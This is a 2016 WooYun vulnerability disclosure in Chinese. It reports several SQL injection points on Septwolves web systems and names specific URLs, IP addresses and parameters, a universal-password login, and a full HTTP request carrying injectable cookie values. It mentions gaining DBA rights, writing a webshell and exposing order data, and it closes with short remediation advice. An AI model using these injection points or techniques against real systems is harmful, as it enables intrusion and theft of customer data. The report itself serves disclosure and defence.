当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171689

漏洞标题:七匹狼多处SQL注入漏洞(webshell/订单详细泄漏)

相关厂商:七匹狼

漏洞作者: 麦兜

提交时间:2016-01-21 17:58

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某处SQL注入漏洞写shell连内网数据库订单泄漏

详细说明:

注入点1:
http://eoa.septwolves.net:8084/carddata.aspx?uid=chenxiaom
注入点2:
http://218.107.193.6:8200/login.aspx (万能密码,有长度限制)
注入点3:
利用注入点2登录后替换cookie,注入.DBA权限

POST /CartList.aspx HTTP/1.1
Host: 218.107.193.6:8200
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://218.107.193.6:8200/CartList.aspx
Cookie: supwhere=1=1; userwhere=1=1; GroupWhere=1=1; LargeWhere=1=1; LittleWhere=[TypeCode]='13'; AttrWhere=1=1; CompanyWhere=1=1; GradeWhere=1=1; ASP.NET_SessionId=xpbyrz55kqp3b5453oxs4j45; ASPSESSIONIDQQDTRRRS=KOMLIDDAGHEPEFAMBHIAABDH; ASPSESSIONIDSSARSQQS=PAGBPEDAFOMDPMBCBIPNPFBD; lang=zh-cn; theme=default; sid=082c7u3q4rd6jj7vfvk948pqh0; windowWidth=1391; windowHeight=636; PHPSESSID=4hbaoga8pc9ku8gm07mgc23if6; UserClass=2; OLO_Name=740DC7B057169B3CCBF7773D032FCA6E15886363CF77CFB61828372E67A21521F9AEDF7D6702825765FDE30691F6EF41DD632BA0FEEED9433ACB52E75B42E69E42971192DAB2E40F580E04BD26262F57DD2D8DEF6F54D9C66CEE6CE0D22B9093E64AA372F6FA5C1166A566EC2F1D6D67E87006D1BAA493486BB5BB4171C4002C736988CF6978891D0202F31220CF340B2B2877D8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2OTc0NTI0OTZkGAEFCUdyaWRWaWV3MQ88KwAKAQgCAWQ%3D&txt_keyword=a&ddl_dept=&ddl_class=&Button1=%E6%90%9C%E7%B4%A2&txt_sl=2


注入点4:
http://59.61.84.241:8087/hpzx/infoshow.asp?id=343
注入点5:
http://218.107.193.6:8082/SysAction.aspx?sysid=3
利用注入点3DBA权限写shell,路径可以在这里看到
http://59.61.84.241:9091/phpinfo.php
我是在dba执行权限下执行ipconfig和phpinfo的ip发现两个站在一个服务器下

漏洞证明:

7psql1.png


7psql3.png


7psql4.png


7psql5.png


7pconfig.png


7p订单.png

修复方案:

首先把业务都放在内网,用VPN连入。再过滤。数据库降权

版权声明:转载请注明来源 麦兜@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)